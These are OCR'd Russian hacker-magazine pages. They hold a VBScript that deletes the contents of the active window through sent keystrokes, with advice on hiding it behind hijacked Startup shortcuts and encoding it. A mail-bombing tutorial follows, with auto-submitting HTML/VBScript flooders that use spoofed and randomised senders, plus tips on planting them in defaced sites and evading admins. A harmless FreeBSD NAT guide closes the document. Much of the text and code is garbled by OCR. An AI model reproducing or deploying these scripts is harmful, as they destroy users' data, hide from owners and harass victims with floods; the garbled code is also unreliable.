WshShell.SendKeys “^{а}" 

TlocbinaeTca комбинация клавиш CTRL+A 

WshShell.SendKeys “+{DEL}” 

‘TlocbinaeTca комбинация клавиш 

SHIFT+DEL 

WshShell.SendKeys “{ENTER}"” 

‘TlocbinaeTca клавиша ENTER 

‘Т.е. сейчас было удалено содержание ак- 

тивного окна 

‘конечно, если это возможно 

WshShell.SendKeys "^{$}" 

‘Посылается комбинация клавиш CTRL+S 

‘Если это текстовый редактор, 

‘то “результат” был сохранен 

WshShell.SendKeys “{ENTER}" 

TlocbinaeTca клавиша ENTER 

WshShell. SendKeys “{LEFT}" 

‘Tlocbinaetca клавиша “Стрелка влево" 

WshShell.SendKeys “{ENTER}"” 

TlocbinaeTca клавиша ENTER 

На случай, если документ создан впервые 

WshShell.SendKeys “%{F4}" 

TlocbinaeTca комбинация клавиш ALT+F4 

‘Окно закрывается, чтобы было нельзя 

сделать откат 

Loop 

‘Заново повторяется вся процедура 


Данный алгоритм не претендует 
на универсальность, но ты можешь 
переделать его под конкретную си- 
туацию. Так что делайте резервные 
копии, господа. 


ЗАЩИТА OT УМНЫХ 

Осталось решить главную задачу: 
сделать так, чтобы все это (ну не все 
- половина :)) запускалось при вклю- 
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Сценарий в исходном виде 


чении РС. Это можно осуществить 
стандартными способами - поместить 
ссылки в реестр или файлы win.ini и 
system.ini. Но едва владелец компа 
запустит волшебную программу 
msconfig.exe или подобную ей, как 
все твои старания пойдут прахом. 
Надо придумать что-то новенькое. 
Могу дать совет. Обрати внимание 
на папку Автозагрузка. Да-да, ту са- 
мую, что в меню “Программы”. И не 
надо материться. Надо читать даль- 
ше. Присутствуют там какие-либо яр- 
лыки? Обычно они там присутству- 
ют, будучи помещенными туда по де- 
фолту пакетом Microsoft Office. Если 
есть, то считай, что тебе повезло. Те- 
перь лезь в свойства ярлыка и смот- 
ри что он запускает. Затем пиши 
ВАТ-файл такого содержания: 


@Start полное_имя_запускаемой_програм- 
МЫ >nul 
@Start полное_имя_запускаемого скрипта >nul 


Теперь сохраняй его под именем 
захваченной программы, но с рас- 
ширением ВАТ, в том же каталоге, 
где она находится, а в свойствах яр- 
лыка изменяй расширение с EXE на 
ВАТ. Не забудь изменить значок у 
ярлыка на оригинальный (Свойства 
- ярлык - сменить значок). Получа- 
ется эдакий симбиоз - при запуске 
программы запустится и твой 
скрипт. Вряд ли у кого-то хватит ума 
проверять эти ярлыки. Остается 
только одна шняга: при запуске 
ВАТ-файлов на экране на миг воз- 
никнет черное окно консоли, на что 
могут обратить внимание. Обойти 
это можно, если указать в ярлыке 
He BAT-cpain, а сам скрипт, добавив 
в него команду запуска программы, 
на которую он ссылался. 

Например: 
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Set Wsh = WScript.CreateObject(“WScript.Shell") 
‘Внимание! Дублирование этой строки в 
скрипте нежелательно! 

Wsh.run “Полное_имя_запускаемой_прог- 
раммы" 


Если же в Автозагрузке ничего нет, 
то не расстраивайся, a понаблюдай, 
какую программу на этом компьютере 
запускают первой и какую - чаще все- 
го, а затем проделай с ее ярлыком все 
указанное выше. Это может быть тот 
же Word или же браузер. И не забы- 
вай, что ярлыки бывают не только в 
Главном меню, а еще и, например, в 
Панели быстрого запуска или на Рабо- 
чем столе. Не лишним будет присво- 
ить скриптам атрибуты "Системный" и 
“Скрытый”. Особенно если в свой- 
ствах папки стоит запрет на отображе- 
ние файлов с такими атрибутами. 


ШИФРОВАНИЕ СКРИПТОВ 

На случай, если владелец компа 
добрался до твоих скриптов, ты мо- 
жешь избавить его от удоволь- 
ствия читать их исходники. Устро- 
ить это можно с помощью програм- 
мы Script Encoder, созданной в Heg- 
pax корпорации Microsoft. Добыть 
ее можно на сайте создателя или 
поискав на софтверных хранили- 
щах под именем $се1Оеп.ехе. Прог- 


Microsoft Script Encoder можно загрузить с сайта ее создателя - www.microsoft.com 


рамма абсолютно бесплатна и не- 
велика по размеру - всего 128 kb в 
установочном файле. Шифрование 
применимо к сценариям как на 
VBScript, так и Ha JScript. 

Формат команды Ha шифрование 
такой: 

Screnc имя_исходного_сфайла 
имя_зашифрованного файла 

Зашифрованные файлы для нор- 
мального функционирования долж- 
ны менять свое расширение с VBS 
на VBE ис JS на JSE соответствен- 
но. В случае, если сценарии нахо- 
дятся в файле WSF или HTML, то 
происходит не изменение расшире- 
ния, а смена атрибутов тега <Script 
language="VBScript"> Ha <script lan- 
guage="VBScript.Encode”>. 

Если в зашифрованном скрипте из- 
менить, добавить или удалить какой- 
либо символ, он становится нерабо- 
чим. Однако не стоит рассматривать 
шифрование как надежную защиту 
от просмотра исходного кода. Специ- 
алист может восстановить из него 
первоначальное содержимое, к тому 
же русские символы в скриптах не 
шифруются. Ну и под конец сообщу, 
что шифрование скриптов WSH воз- 
можно только с версии 2.0. 


48="т: "+ 
2script lanquages"VESer ipt. Encode" sl лыбадд даны, РФ’ "9; РБ) ОВР. р, PP 


Тот же сценарий после шифрования 
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Это приведет к 
соответствую- 
щим результа- 
там: удалению 
файлов и па- 
пок, текстов 
(смотря какое 
окно было на 
первом плане), 
выскакиванию 
глаз из орбит, 
порче матери- 
альных цен- 
ностей, биению 
головой о сте- 
ну, массовым 
явлениям суи- 
цида. 


Вряд ли у ко- 
го-то хватит 
ума проверять 
ярлыки. 


Улому ио 
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ОФИСНЫЙ СПАМ 


Можно ука- 
зать любой 
адрес отпра- 
вителя, хоть 
president@ 
whitehouse.gov 


Форма рас- 
считана на 
отправку og- 
ного письма, 
но нам это не 
страшно 


Анализирующий 
(analyst1945@mail.ru) 


БОМБЕЖКА ИЗ БРОУЗЕРА 


Центру Американского Английского посвящается... 


ВНИМАНИЕ! Все URL и e-mail адреса вымышленные. Любые совпадения случайны. 
При написании статьи ни одно животное не пострадало. 


аверняка у тебя воз- 

никало желание 

отомстить проклятому 
недругу, закидав его ящик спамом. 
А где этим заняться, как не на ра- 
боте, во время очередного пятича- 
сового перерыва на перекур? Для 
воплощения этой мечты можно 
выбрать несколько путей. 


Для начала никто не мешает тебе 
воспользоваться услугами фирм, 
специализирующихся на отсылке 
анонимной почты, но за это придется 
отвалить децл бабла. Можно исполь- 
зовать специализированные прог- 
раммы (так называемые маил-бомбе- 
ры), но этот путь довольно сложен, 
так как требуется найди соответству- 
ющую программу и подходящий поч- 
товый сервер; практически все проги 
такого рода отлавливаются антиви- 
русами (особенно если ты корпора- 
тивный пользователь); тебе может 
быть открыт доступ только к внутрен- 
нему почтовому серверу или серверу 
провайдера, или вообще запрещено 
использование почтовых протоко- 
лов. Но даже если все будет ОК и 
удастся запустить спаммерскую ути- 
литу, то останется риск того, что ag- 
мины используемого почтового сер- 
Baka, заметив подозрительную актив- 
ность, поставят приходящие письма 
в игнор. Можно завести левый ящик 
на бесплатных сайтах, но данный ме- 
тод, вследствие его тормознутости, 
пригоден исключительно для мазо- 
хистов. Тем более, что при работе с 
ним в логах остается твой айпишник, 
конечно, если не пользоваться ано- 
нимным прокси-сервером. 


СЛУЖБЫ АНОНИМНОЙ 
ОТПРАВКИ ПОЧТЫ 
Остановим свой взгляд на так назы- 
ваемых “Службах анонимной отправ- 
ки почты", предоставляющих свой 
сервис через web-cpopmy. Найти no- 
добные сайты не просто, а... очень 
просто: достаточно набрать в поис- 
ковой системе запрос вида "+почта 
+отправка +анонимно +бесплатно 
+спужба +форма". Любой поисковик 
через пару секунд выдаст на-гора 
несколько сотен адресов. 

Чтобы отправить письмо, доста- 
точно лишь набрать текст и agpec- 
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ные данные в форме, нажать кноп- 
ку Submit (Отправить). Причем аб- 
солютно не требуется какая-либо 
авторизация, и можно указать лю- 
бой адрес отправителя, хоть presi- 
dent@whitehouse.gov :). Не лишним 
будет ознакомиться с правилами 
оформления письма, которые, ско- 
рее всего, расположены на этой же 
страничке (например, поле адреса 
допускает ввод только одного е- 
пай). Вот только форма рассчитана 
на отправку одного письма, но нам 
это не страшно ;). 


ДОБАВЬ ВОЗМОЖНОСТЕЙ 
ПОЧТОВОЙ СЛУЖБЕ 

Сохраняй страничку с формой себе 
на винт. Сейчас займемся ее виви- 
секцией. Открывай код полученной 
страницы в Блокноте. В ней тебе 
нужен участок, ограниченный тега- 
ми <FORM ...> и </FORM>. Все осталь- 
ное, кроме обязательных компонен- 
тов, можно выбросить. Должно по- 
лучиться что-то вроде: 


<HTML> 

<HEAD> 

</HEAD> 

<BODY> 

<form action="http://www.anysite.com/cai- 
bin/mailsender.cgi” method="POST"> 


Сервис анонимной отправки почты из окна браузера 


<table bgColor="#ffce66” cellspacing=2 cell- 
padding=2 border=0 align=center> 
<tro<td bgcolor=#ffefce> 

<table width=480 cellspacing=10 cell- 
padding=0 border=0 align=center> 

<tr title="BBeguTe ваше имя или ник лати- 
нскими символами"> 

<td><font size=-1><b>Balwe имя или 
HuK</b></font></td> 

<td><font size=-1><input type="text” 
name="fname" size=40 
maxlength=40></font></td></tr> 

<tr title="BBegute ваш e-mail agpec”> 
<td><font size=-1><b>Baw e-mail ag- 
pec</b></font></td> 

<td><font size=-1><input type="text” 
name="femail” size=40 
maxlength=40></font></td></tr> 

<tr title="BBegute только e-mail адрес no- 
лучателя сообщения"> 

<td><font size=-1><b>Komy (только 
e-mail)</b></font></td> 

<td><font size=-1><input type="text” 
name="toemail” size=40 
maxlength=40></font></td></tr> 

<tr title="BBegute тему сообщения"> 
<td><font size=-I<b>Tema сообще- 
Huas/b></font></td> 

<td><font size=-1><input type="text” 
name="subject” size=40 
maxlength=40></font></td></tr> 
<td><font size=-1><b>Tekct сообще- 
Huia</b></font></td> 


<td><textarea rows=8 cols=34 name="body” 
maxlength=1000></textarea></td></tr> 

<trostd> 

</td> 

<td><input type="submit” value="OTnpaButb” 
title="Hakmute для отправки" style="back- 
ground:#d4d0c8;font-size:12px;">&nbsp; 
<input type="reset” value="Ou4nctuTb” 
title="O4ncTuTb все поля формы” 
style="background:#d4d0c8;font- 
size:l2px;"></td></tr></table> 

</td></tr></table> 

<input type="hidden” name="Ing" value="ru"> 
<input type="hidden” name="v" value="post"> 
</form> 

</BODY> 

</HTML> 


Ок. Значит, форма улетает Ha 
ЦГайку по адресу http://www. 
anysite.com/cgi-bin/mailsender.cgi. 
Нет никаких идентификаторов сес- 
сии и подобной ерунды. То, что 
доктор прописал. Теперь из этой 
каши следует выделить только не- 
обходимые элементы формы. Вот 
что должно остаться: 


Не изменяй и не превышай длину 
полей ввода, так как возможна 
проверка корректности введенных 
данных на сервере (хотя стоит поп- 
робовать ;)). Далее надо добавить 
значения по умолчанию в соответ- 
ствующие поля. Например: 


<input type="text” name="fname” 
value="President"><BR> 

<input type="text” name="femail” 
value="president@whitehouse.gov"><BR> 
<input type="text” name="toemail” 
value="billgates@microsoft.com"><BR> 


Тегу <FORM> следует дать уни- 
кальное имя: 


<form name="formname” 
action="http://www.anysite.com/cai- 
bin/mailsender.cgi” method="POST"> 


Вот что примерно получится: 
<HTML> 


<HEAD> 
</HEAD> 


Грозное оружие размером в 743 байта 


<HTML> 

<HEAD> 

</HEAD> 

<BODY> 

<form action="http://www.anysite.com/cgi- 
bin/mailsender.cgi" method="POST"> 
<input type="text” name="fname" size=40 
maxlength=40><BR> 

<input type="text” name="femail” size=40 
maxlength=40><BR> 

<input type="text” name="toemail” size=40 
maxlength=40><BR> 

<input type="text” name="subject” size=40 
maxlength=40><BR> 

<textarea rows=8 cols=34 name="body" 
maxlength=1000></textarea><BR> 

<input type="submit" value="Otnpa- 
BuTb>&nbsp; 

<input type="reset” value="OunctuTb"> 
<input type="hidden” name="Ing” 
value="ru"> 

<input type="hidden" name="v" 
value="post"> 

</form> 

</BODY> 

</HTML> 


Препарированный интерфейс сервиса 


<BODY> 

<form name="formname” 
action="http://www.anysite.com/cgi- 
bin/mailsender.cgi” method="POST"> 
<input type="text” name="fname" 
value="President"><BR> 

<input type="text” name="femail” 
value="president@whitehouse.gov'"><BR> 
<input type="text” name="toemail” 
value="billgates@microsoft.com"><BR> 
<input type="text” name="subject” 
value="Hi"><BR> 


Почтовый интерфейс 
с данными по умолчанию 


<textarea rows=8 cols=34 name="body">Hi, 
Bill</textarea><BR> 

<input type="submit" value="Ortnpa- 
BuTb>&nbsp; 

<input type="reset” value="O4ncTuTb"> 
<input type="hidden" name="Ing" 
value="ru"> 

<input type="hidden” name="v" 
value="post"> 

</form> 

</BODY> 

</HTML> 


Остается создать механизм массо- 
вой отправки данного письма. Он 
go предела прост: 


<Script type="text/vbsript"> 

sub window_onload 

‘OTCbINaeM форму при открытии окна. 
m=100 

"Количество писем. Укажи, сколько надо. 
"Например, 10240, если ящик на 10 Mb :)). 


for х=1 to т о 
document.formname.submit. о 
‘Команда отправки формы на сервер. is 
next = 
‘Следующий виток цикла. > 
end 


alert “Mesages have been sent” 

‘При завершении цикла выводится COOO- 
щения. Можно убрать. 

</Script> 


Что будет в итоге: 


<HTML> 

<HEAD> 

</HEAD> 

<BODY> 

<form name="formname” 
action="http://www.anysite.com/cgi- 
bin/mailsender.cgi” method="POST"> 
<input type="text” name="fname" 
value="President"><BR> 

<input type="text” name="femail” 
value="president@whitehouse.gov'"><BR> 
<input type="text" name="toemail” 
value="billgates@microsoft.com"><BR> 
<input type="text” name="subject” 
value="Hi"><BR> 

<textarea rows=8 cols=34 name="body">Hi, 
Bill</textarea><BR> 

<input type="submit" value="Ortnpa- 
BuTb'>&nbsp; 

<input type="reset” value="Ou4nctuTb"> 
<input type="hidden" name="Ing" 
value="ru"> 

<input type="hidden" name="v" 
value="post"> 

</form> 

<Script type="text/vbsript"> 

sub window_onload 


m=100 

for x=1 {0 т 

document.formname.submit. Tpam в клубе 

next должна быть 

end неограничен- 
ным, иначе 

</Script> админы тебе 

о поотбивают 

< я 


Итого: грозное оружие размером 
в 743 байта. Кликнул по HTML-ke, и 
готово! 


подложи свинью 

Если испытываешь определенные 
(знаем мы эти "определенные" $$$ :)) 
затруднения с доступом в Интернет, 
то пиши дополнительный сценарий: 


<?xml version="1.0" encoding="IS0-8859-1"?> 
<gjob id="T1"> 

<script language="VBScript"> 

<I[CDATAL 

Option explicit 
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Воспользуйся 
эффектом ум- 
ножения. 


Теперь при 
каждом посе- 
щении “заде- 
фейсенной" 
страницы к 
жертве будет 
улетать туча 
сообщений. 


раде 052 | 


Dim ProgName, WshShell 
ProgName="flood.html” 


"В кавычках нужно указать имя HTML файла. 


On Error Resume Next 

‘Отключаем вывод сообщения в случае 
ошибки. 

Set WshShell=WScript. 
CreateObject(“WScript.Shell”) 
WsCript.Sleep 1200000 

‘Длительность паузы в миллисекундах. 
"Ты ведь не хочешь, чтобы тебя сразу 
схватили? 

WshShell.Run Ргодпате, 0 

‘Запускаем флудер в невидимом режиме. 
IP 

</script> 

</job> 


<input type="hidden” name="subject” 
value="Hi"><BR> 

<div name="body" style="color=blue;back- 
ground color=blue”>Hi, Bill</div><BR> 
<input type="hidden” name="Ing” 
value="ru"> 

<input type="hidden” name="v" 
value="post"> 

</form> 

<Script type="text/vbsript"> 

sub window_onload 

m=100 

for x=1 to m 
document.formname.submit. 

next 

end 

</Script> 


Не бойся экспериментировать. 


Теперь сохрани его в текстовом 
qpopmate с расширением WSF, сли- 
вай оба файла на дискетку и иди в 
клуб (траф в клубе должен быть 
неограниченным, иначе админы те- 
бе все почки поотбивают), пихай в 
какой-нибудь каталог поглубже и 
запускай скрипт. Сразу не уходи - 
поиграй немного, для вида. Остает- 
ся только пожинать плоды столь 
кропотливой работы :). 


УВЕЛИЧЬ МАСШТАБЫ 

Если ты продвинутый хакер, то мо- 
жешь задефейсить какой-либо 
сайт, добавив в главную страницу 
эту форму. Предварительно сделай 
все элементы скрытыми, а текст со- 
общения одного цвета с фоном. 
Например: 


<HTML> 

<HEAD> 

</HEAD> 

<BODY> 

<form name="formname” 
action="http://www.anysite.com/cgi- 
bin/mailsender.cgi" method="POST"> 
<input type="hidden” name="fname" 
value="President"><BR> 

<input type="hidden” name="femail” 
value="president@whitehouse.gov'"><BR> 
<input type="hidden” name="toemail” 
value="billgates@microsoft.com"><BR> 
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Остальной код страницы тут 


</BODY> 
</HTML> 


Теперь при каждом посещении 
задефейсенной паги к жертве бу- 
дут улетать т сообщений. 


ТОННЫ МУСОРА 

ПО УЗКОМУ КАНАЛУ 

Если у тебя Dial-Up и скорость goc- 
тупа в Инет оставляет желать луч- 
шего, то воспользуйся эффектом 
умножения. Поясняю. Существуют 
различные службы, предоставляю- 
щие доступ ресурсам Сети (напри- 
мер, к FTP) через электронную поч- 
ту. Тебе остается оформить заказ 
на файлик, размером мегабайт так 
в 15-20, указав в поле “OT кого: 
(From:)" адрес жертвы. Жалко, что 
у таких служб стоит ограничение 
на количество принимаемых зая- 
вок. Некоторые службы высылают 
справку по своей работе, если на 
ее адрес будет получено письмо со 
словом “Help” в теле или заголов- 
ке. Также следует обратить внима- 
ние на ссылки “Заказать Ha E-Mail” 
на софтверных (и не только) сай- 
тах. Ну а если встретишь сервис с 
поддержкой аттачей без предвари- 


тельной закачки на сервер, то счи- 
тай, что тебе крупно повезло :)). 


Если же хочешь ограничиться 
простым флудом почтового ящика, 
то я рекомендую при каждом “Ce- 
aHce” случайным образом генери- 
ровать адрес и ник отправителя, 
тему письма и др. В этом случае 
обычные антиспаммерские фильт- 
ры будут бессильны - ведь обрат- 
ный-то адрес каждый раз новый! 
Пример такого подхода приведен 
ниже. Для начала создай HTML- 
документ с именем, ну, например, 
send.htm. 


<HTML> 

<HEAD> 

</HEAD> 

<META HTTP-EQUIV="refresh” CONTENT="2; 
URL=pause.html “> 

<BODY> 

<SCRIPT TYPE="text/VBScript"><!- 

sub window_onload 

‘Формирование и отправка писем начина- 
ется сразу после открытия документа. 
Randomize 

‘Оптимизируем генератор случайных чисел. 
"Процедура формирования _имени_ отпра- 
вителя :). 

Югх=1 {0 8 

‘Указывай длину ника. 

symb = Int((26)*Rnd)+96 

'Случайным образом определяется символ. 
if symb <> 96 then 

‘Проверяется, является ли он буквой. 
fromnik = fromnik & chr(symb) 

‘Если да, то OH присоединяется к нику. 
end if 

"Конец проверки. 

next 

‘Переход к следующему символу. 
‘Аналогично формируется ложный логин 
обратного адреса. 

for x=1to 6 

symb = Int((26)*Rnd)+96 

if symb <> 96 then 

maillogin=maillogin & chr(symb) 

end if 

next 

‘и ложный домен. 

for x=1to 6 

symb = Int((26)*Rnd)+96 

if symb <> 96 then 

maildomain=maildomain & chr(symb) 
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Инструкция для заказа прайса. Интересно, сколько он весит :) 


end if 

next 

frommail = maillogin & "©" & maildomain & 
“com” 

‘Конструируется полный адрес отправителя. 
‘Формируется тема письма. 

for x = 110 10 

symb = Int((26)*Rnd)+96 

if symb <> 96 then 

mailsubj=mailsubj & chr(symb) 

end if 

next 

‘Используя полученные данные, генериру- 
ется заполненная форма. 

Document.open 

Document.write “<form action="http:// 
www.anysite.com/cgi-bin/mailsender.cgi’ 
name='formname’ method='POST’>" 
Document.write “<input type="text’ 
name='fname’ value="" & fromnik & “><BR>" 
Document.write “<input type="text’ 
name='femail’ value="" & frommail & “’><BR>" 
Document.write “<input type='text’ 


Отправка SMS через Web 


name='toemail’ 
value='billgates@microsoft.com'><BR>” 
Document.write “<input type='text’ 
name='subject’ value=" & mailsubj & “'><BR>" 
Document.write “<textarea rows=8 cols=34 
name='body' 
maxlength=1000>Hi</textarea><BR>” 
Document.write “<input type='submit' 
value='OtnpaButb’>&nbsp;” 

Document.write “<input type='reset' 
value='O4unctutb’>" 

Document.write “<input type="hidden’ 
name='Ing’ value='ru’>" 

Document.write “<input type="hidden’ 
name='v' value='post’>” 

Document.write “</form>” 

Document.close 

document.formname.submit 

mailsubj="" 

frommail= 
'Обнуляем использованные переменные. 
‘После чего она отправляется. 
window.location="send1.htm|” 

‘Для обновления параметров загружаем 
второй документ. 

end sub 

></SCRIPT> 

</BODY> 

</HTML> 


пи 


Теперь копируй этот файл с име- 
нем sendi.htm и заменяй строку кода 


window.location="send1.html" 

Ha 
window.location="send.html”. 

В итоге, после запуска одного из 
них из первого документа будет вы- 
зываться второй, а из второго - пер- 
вый. Получается кольцевая схема. 
Флуд будет продолжаться до тех 
пор, пока ты не умудришься зак- 
рыть окно браузера. А это не так-то 
просто (поверь мне ;)) как с мораль- 
ной, так и с физической стороны. 


Отправка ICQ через Web 


РАСШИРЬ КРУГОЗОР 

Данный способ пригоден для 
флуда не только электронной 
почты, HO “ICQ, SMS, факсов, 
пейджеров и, при некотором 
ухищрении, - форумов, если там 
нет авторизации. Достаточно 
лишь найти соответствующие сер- 
висы, задав в поисковой машине 
комбинации “'+5еп4 +free +$т5", 
“+send t+free +fax" и т.д. 


Не бойся экспериментировать. Если 
не получилось, попробуй добавить 
что-либо из оригинального докумен- 
та. Все зависит от конкретного сайта. 


== 


wear Hal 
Bee eT, 


Ae ee ти. a bee cee 


Отправка факса через Web 


за бесплатность, в письма вставля- 
ются баннеры или текстовые сооб- 
щения. Также возможно ограниче- 
ние на количество отправленных 
писем в единицу времени. Ограни- 
чение обычно осуществляется ис- 
пользованием плюшек (что баналь- 
но обходится блокированием 
Cookie в свойствах браузера, наст- 
ройкой файрволла или очисткой 
директории Cookies) или проверкой 
по IP-agpecy (используй анонимные 
прокси). Конечно, может потребо- 
ваться некоторая автоматизация, 
но это уже тема другой статьи. 


Также возможна неприемлемая 
задержка в несколько минут или 
даже часов (складывается впечат- 
ление, что админы читают письма 
перед пересылкой). Не следует об- 
ращаться к сервисам, расположен- 
ным на бесплатных хостингах (это 
можно узнать по URL почтового 
сервиса), так как админами этих 
сайтов уделяется особое внимание 


Пример рекламного баннера 


ВЫБИРАЙ ПРАВИЛЬНО 
Перед выбором системы анонимных 
сообщений следует руководство- 
ваться следующими правилами: 
Перво-наперво, надо протестиро- 
вать возможности службы. Для 
этого заведи бесплатный почтовый 
ящик, благо этого добра сейчас 
предостаточно, и отошли на него, 
используя тестируемую службу, 
несколько писем с одинаковым со- 
держанием, темой и адресом отпра- 
вителя. Засеки время пересылки и 
оригинальность полученного текс- 
та. Иногда, в качестве компенсации 


загруженности каналов и подозри- 
тельной активности скриптов. Ну и, 
наконец, непосредственно перед 
боевыми действиями, во избежание 
конфуза, следует протестировать 
полученное детище на своем левом 
ящике. В этом нет ничего опасного. 

Удачи в мести ненавистным спам- 
мерам. Будь осторожен, пользуйся 
проксиками, мой руки перед едой, 
уступай бабушкам место в общест- 
венном транспорте. 


НЕЕ 
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Данный способ 
пригоден для 
флуда не толь- 
ко электронной 
почты, HO и 
ICQ, SMS, фак- 
сов, пейджеров 
и даже форумов. 


Перед боевы- 
ми действиями 
следует про- 
тестировать 
полученное 
детище на 
своем левом 
ящике. 


улому UDO 


НОМИТО/САМЫЙ СЕРЬЕЗНЫЙ ГЕЙТ 
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Почитать про 
ipfw можно на 
http://ipfw. 
ism.kiev.ua/ 
ipfirewall.html 


DemiurG (arkhangel@mail.ru) HIBHE 


о как же остальные 
UNIX системы? Ведь 
| существует масса 
других бесплатных стабильных опе- 
рационных систем, более пушис- 
тых, идейных, радующих сердце 
(ночами) и согревающих душу в мо- 
розный день. Ты, наверно, уже по- 
HAN, мой маленький друг, что сегод- 
ня мы будем говорить о FreeBSD. 


КТО Я ТАКОЙ? 

Я работаю системным администрато- 
ром в одной из московских фирм. В 
один чудный день руководство компа- 
нии попросило меня (да-да, меня... си- 
садмина) создать систему трафика, по 
которой было бы видно, сколько каж- 
дый пользователь выкачивает из Ин- 
тернета. Прошел месяц, и эта система 
трафика была создана и уже почти 
два месяца как практически без багов 
(что удивительно) сфункционирует в 
нашей сети. Именно опытом создания 
такой системы я и хочу поделиться на 
страницах нашего любимого журнала 
(я о Спец-Хакере, если кто не понял). 


АХТУНГ! АХТУНГ! ФРИБЗДЯ... 
Операционная система FreeBSD не 
имеет ничего общего с Линухом. У 
них изначально были совершенно 
разные пути развития и принципиаль- 
но разная история. Если FreeBSD no 
сути вышла из институтской среды, 
мутировав из UNIX System V, то linux 
был полностью написан с нуля Лину- 
сом Торвальдсом, который просто пы- 
тался написать хороший бесплатный 
UNIX (что ему в принципе и удалось). 
FreeBSD имеет более долгую историю, 
более глобальные корни (схему раз- 
вития можно проследить на сайте 
http://www.levenez.com/unix/history. 
html#06). Я надеюсь, что ты более-ме- 
нее подкован, так как такие вещи, как 
установка FreeBSD, работа с сетью, 
компилирование ядра, здесь рассмот- 
рены чисто схематично. 


ФИГНЯ ВОЙНА - 

ГЛАВНОЕ МАНЕВРЫ 

Что такое МАТ? МАТ расшифровы- 
вается как Network Address 
Translation. Он позволяет локаль- 
ной сети выходить в другую сеть 
(ну, допустим в Интернет) через 


me 


== 
Lie Le | 08(33) 2003 


Схема функционирования NAT (switch 
показан для упрощения понимания 
процесса) 


один комп. Функционирование МАТ 
показано на схеме. 

Комп, через который идет весь тра- 
фик сети, называется роутером или 
маршрутизатором. Стоит заметить, 
что роутер является компьютером 
лишь в частном случае. Очень часто 
(если позволяют средства) в качест- 
ве маршрутизаторов мы видим всем 
известные устройства компании 


Cisco и их конкурентов. Это все я к 
тому, что Сетевая Трансляция Адре- 
сов - это не просто программка, для 
того чтобы тебе было удобнее ка- 
чать порнушку, а технология, кото- 
рая встраивается практически во все 
роутеры, и реализовать ее можно 
практически на любой системе. 
Обычно (иначе просто не имеет 
смысла) на МАТ навешен еще и fire- 
wall, который, благодаря админским 


САМЫЙ СЕРЬЕЗНЫЙ ГЕЙТ 


НАСТРАИВАЕМ IPFW + МАТ BO FREEBSD 


правилам, запрещает/разреша- 
ет/подсчитывает определенные ip- 
пакеты. Благодаря МАТ достигается: 

1) экономия р-адресов, так как ис- 
пользуется только один внешний 
адрес, который мы и пробиваем на 
роутере; 

2) увеличивается безопасность, 
так как все внутренние адреса 
скрыты за роутером, на котором 
firewall отсекает ненужные запросы; 

3) централизованное администри- 
рование, что, согласись, очень важ- 
но для крупных сетей (банальный 
пример: для того чтобы запретить 
выход какому-либо хосту или груп- 
пе хостов по www, админу придется 
прописать всего лишь одно прави- 
ло на роутере, а не бегать к поль- 
зователю и что-либо менять на его 
машине). 


А ПОЧЕМУ НЕ ПРОКСИ? 

Да, точно, спросишь ты, почему бы 
вместо роутера не создать баналь- 
ный прокси-сервер, который занима- 
ется (по сути) тем же самым делом 
(скрывает за собой локальную сеть). 
Возможно, если бы мы занимались 
этим под Винды, но сам firewall во 
freebsd (ipfw) работает на уровне яд- 
ра. МАТ же представляет собой де- 
мон (МАТЬ), которому мы, используя 
функцию divert, перенаправляем тра- 
фик, но дела это не меняет, так как 
вся фигня с пакетами происходит на 
уровне ipfw. За счет этого скорость 
работы и точность подсчета проходя- 
щих пакетов стремятся к максимуму, 
а тот же прокси-сервер (wingate на 
windows или squid на UNIX) будет ра- 
ботать как приложение (в Винодах - 
сервис на юнихе - демон), что отрица- 
тельно сказывается на производи- 
тельности. Кроме того, очень часто 
при работе с wingate приходится nog- 
нимать у/пдате-клиент, что не есть 
гуд. МАТ же полностью прозрачен - 
если тебе надо отключить какой-либо 
протокол или запретить доступ к ка- 
кому-то порту, ты на лету изменяешь 
правила, и тебе даже не придется пе- 
регружать таблицы. Стоит заметить, 
что и МАТ можно с легкостью реали- 
зовать в Винде (вариантов масса - 
хотя бы через winroute), но многие 
преимущества сразу теряются (win- 


route будет работать с пакетами как 
сервис, а не как неделимая частичка 
целого kernel’a). Короче, ты понял: 
ргоху - зиххх, МАТ - рулит. 


ОТВЕТ НА ВСЕ ОДИН - ИЩЕМ 
Сейчас мы создадим (точнее, попы- 
таемся создать) примитивный роу- 
тер, через который наша локаль- 
ная сеть будет выходить вовне (ко- 
личество компов неважно, хоть 
один, хоть 500). Сразу скажу, что 
пишу для тех, кто более-менее ра- 
зобрался в структуре и работе 
freebsd (для тех, кто еще не успел, 
существует отличная статья - 
“FreeBSD 4.3 step by step", опубли- 
кованная в номере 05.02 журнала 
Хакер: http://www.xakep.ru/maga- 
zine/xa/040/058/1.asp). 

Что мы имеем: машину, Ha KOTO- 
рой стоит freebsd 4.7 (последний 
доступный stable релиз 4.8 - я еще 
в продаже не видел, 5-ую ветку мы 
не рассматриваем). На этом компе у 
нас две сетевые карточки: xIO - 
смотрит в твою сеть (ее ip - 
192.168.6.12), xl1 - бацается с твоим 
провом (ip 212.212.212.212 - чисто ра- 
ди примера). 

Для начала мы перекомпилируем 
ядро. Для облегчения понимания 
представим, что за нашим роутером 
скрывается сеть из 2 компов с ip-ag- 
ресами: 192.168.6.200 и 192168.0.55. 


ОН СКАЗАЛ ПОЕХАЛИ 

Ядро по умолчанию находится в ди- 
ректории “/usr/src/sys/i386/ 
conf/GENERIC". Создадим его ко- 
пию и назовем наше новое ядрыш- 
ко “хакер”: 


cp GENERIC хакер 


Отредактируем полученный cpann. В 
самый конец вставляем инструкции: 


options IPFIREWALL 

(включает ipfw в ядро); 

options IPFIREWALL_VERBOSE 
(возможность вести логи по паке- 
там, в первое время тебе это не по- 
надобится, но зато потом, когда 
возмужаешь...); 

options IPDIVERT 

(МАТ не знает что такое ipfw, поэто- 
му нам надо будет перенаправить 
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Редактируем конфиг Кегпе!а (вид из vi) 


на него весь траффик, это делается 
с помощью инструкции divert, nog- 
робности ниже); 
options DUMMYNET 
(в общем DUMMYNET служит для or- 
раничения полосы пропускания тра- 


фика (допустим, тебе надо, чтобы Ma- 


ша не могла закачать в день больше 
10 метров порнухи с WWw.porno.com, 
ты пишешь соответствующее прави- 
ло), но очень часто бывает, что тебе 
потом придется использовать неко- 
торые функции IPFW, которые ис- 
пользуют ВУММУМЕТ, так что не за- 
будь его включить). 

Эти четыре правила по сути обя- 
зательны. Но любой продвинутый 
(ga и не продвинутый тоже) админ 
может накидать тебе целую кор- 
зинку дополнительных правил, с 
помощью которых ты сможешь 
подбить зесиге-истость своей сети. 


options IPFIREWALL_VERBOSE_LIMIT=10 
(возможность лимита Ha количест- 
